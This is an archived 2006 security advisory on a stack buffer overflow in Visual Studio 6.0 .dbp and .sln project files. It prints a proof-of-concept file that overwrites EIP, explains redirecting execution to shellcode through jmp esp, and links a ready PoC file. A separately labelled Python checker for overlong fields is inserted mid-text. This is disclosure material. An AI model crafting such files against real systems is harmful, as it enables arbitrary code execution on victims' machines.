
vs60bo.txt
Posted Mar 6, 2006
Authored by ATmaCA, Kozan | Site spyinstructors.com

A buffer overflow vulnerability exists in the handling of .dbp and .sln files for Visual Studio version 6.0 and Microsoft Development Environment version 6.0.

tags | advisory, overflow
SHA-256 | c470a3d747fd65b82c9b1c8bd186c168a80918821c5b1940eed620042405b6ca

Visual Studio 6.0 Buffer Overflow Vulnerability

Bug Discovered by Kozan
Credits to ATmaCA
Web: www.spyinstructors.com
Mail: kozan@spyinstructors.com

Affected Vendor:

Microsoft (www.microsoft.com)


Affected Products:

Microsoft Visual Studio 6.0 (with latest Service Pack 6)
Microsoft Development Environment 6.0 (SP6) (Microsoft Visual InterDev 6.0)


Vulnerability Details:

A buffer overflow vulnerability exists in the handling of the following file formats of the affected products.


Visual Studio Database Project File (.dbp)
Visual Studio Solution (.sln)



The vulnerability is caused by a boundary error in the handling of a ".dbp" file (.sln files are also affected) that contains an overly long string in the "DataProject" field. This can be exploited to cause a stack-based buffer overflow and allows arbitrary code execution when a malicious ".dbp" file is opened.
A specially crafted project file can overwrite a stack-based buffer, giving full control of the EIP register and allowing code execution that compromises the user's system.



An example .dbp file:

# Microsoft Developer Studio Project File - Database Project
Begin DataProject = "ProjectName"
End


Carriage return and line feed characters (0x0d and 0x0a) and some others (0x00 ...) cannot be used in the project name value.


An example .dbp file which overwrites EIP register:

# Microsoft Developer Studio Project File - Database Project
Begin DataProject = "Project1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXXXX
AAAA123456AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
End

The length must be exactly 384 bytes. Otherwise other registers are overwritten differently and the exploitation method changes, so a length of 384 bytes is the most suitable.

In this example, when the file is opened:

XXXX (0x58585858) overwrites EIP.
The bytes 123456AAAA... (3132333435364141... in hex) are at ESP.

So an attacker could create a malicious .dbp project file that places a payload at ESP, with EIP pointing to that shellcode through a jmp esp or call esp opcode in a loaded module.
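A defensive triage check for the format described above, added here as an example and not part of the advisory: it parses the `Begin DataProject = "..."` line of a .dbp file on raw bytes and flags a project name longer than a conservative limit. The 128-byte limit is an assumption (the advisory reports 384 bytes as the length that reaches EIP), the sample file contents are constructed, and the .sln variant is not covered because the advisory gives no format detail for it.

```python
import re
import sys

# Constructed sample .dbp contents (not the advisory's PoC file).
BENIGN_DBP = (
    b"# Microsoft Developer Studio Project File - Database Project\r\n"
    b'Begin DataProject = "ProjectName"\r\n'
    b"End\r\n"
)
# The advisory reports a 384-byte DataProject value as the length that overwrites EIP.
OVERLONG_DBP = (
    b"# Microsoft Developer Studio Project File - Database Project\r\n"
    b'Begin DataProject = "' + b"A" * 384 + b'"\r\n'
    b"End\r\n"
)

# Assumed triage limit: far below 384, yet generous for any real project name.
MAX_SAFE_NAME_LEN = 128

# Match the Begin DataProject line; capture everything after the opening quote.
DATAPROJECT_RE = re.compile(rb'^Begin DataProject\s*=\s*"(.*)$', re.MULTILINE)


def extract_dataproject_name(data: bytes):
    """Return the raw DataProject value, or None if the field is absent.
    Works on bytes so embedded NULs or odd encodings cannot hide the true length."""
    m = DATAPROJECT_RE.search(data)
    if m is None:
        return None
    rest = m.group(1)
    end = rest.find(b'"')
    # An unterminated value (no closing quote on the line) is taken up to end of line.
    return rest.rstrip(b"\r") if end < 0 else rest[:end]


def check_dbp(data: bytes, limit: int = MAX_SAFE_NAME_LEN):
    """Classify a .dbp body: ('ok' | 'overlong' | 'no-dataproject', name_length)."""
    name = extract_dataproject_name(data)
    if name is None:
        return ("no-dataproject", 0)
    if len(name) > limit:
        return ("overlong", len(name))
    return ("ok", len(name))


if __name__ == "__main__":
    # Usage: python check_dbp.py file1.dbp file2.dbp ...
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            verdict, length = check_dbp(fh.read())
        print(f"{path}: {verdict} (DataProject length {length})")
```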


PoC:

The local path length of the .dbp file changes the arrangement of the malformed data, so the exploit has to re-align the data for the total path length.

Copy the following file as c:\deneme\Project1.dbp

http://www.spyinstructors.com/kozan/poc/vuln.dbp